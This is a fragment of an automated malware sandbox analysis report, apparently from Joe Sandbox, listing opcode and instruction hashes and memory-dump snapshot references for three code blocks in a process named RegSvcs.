                                            • Opcode ID: 257977cf14dba98ef7b9aed6bfd887691ece3639bac1d5dfe2745b966ec0fd73
                                            • Instruction ID: 4d757d4deb4ab8e24a62911ae852dbed2c8b8154d5396f047e5d01038cbd5ba5
                                            • Opcode Fuzzy Hash: 257977cf14dba98ef7b9aed6bfd887691ece3639bac1d5dfe2745b966ec0fd73
                                            • Instruction Fuzzy Hash: 901156B1C0065ADBCB10DF9AC445BDEFBF4AF08320F15812AD818B7241D778A905CFA5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2951585596.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_abd000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51aaeb35c3327fe0f6c6b39a0b8312f98e1f4e0265cf33d85c33ff1e9d29db92
                                            • Instruction ID: 7a4ff56b24f4e6080e13549be7995503fc1ca85614e338ad0857797b5f98ad0f
                                            • Opcode Fuzzy Hash: 51aaeb35c3327fe0f6c6b39a0b8312f98e1f4e0265cf33d85c33ff1e9d29db92
                                            • Instruction Fuzzy Hash: 2B210076604204DFDB14DF10D9C0B66BF69FB98324F20C5A9E8090A247D33AE856CAA2
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2951585596.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_abd000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                            • Instruction ID: d76c34be603c7e60c209c9e90fa8abc8f1315ba3458b25e9a15ed686b1e18e71
                                            • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                            • Instruction Fuzzy Hash: 8511BE76504284CFCB16CF10D9C4B56BF72FB94324F24C6A9D8490B657D33AE85ACBA2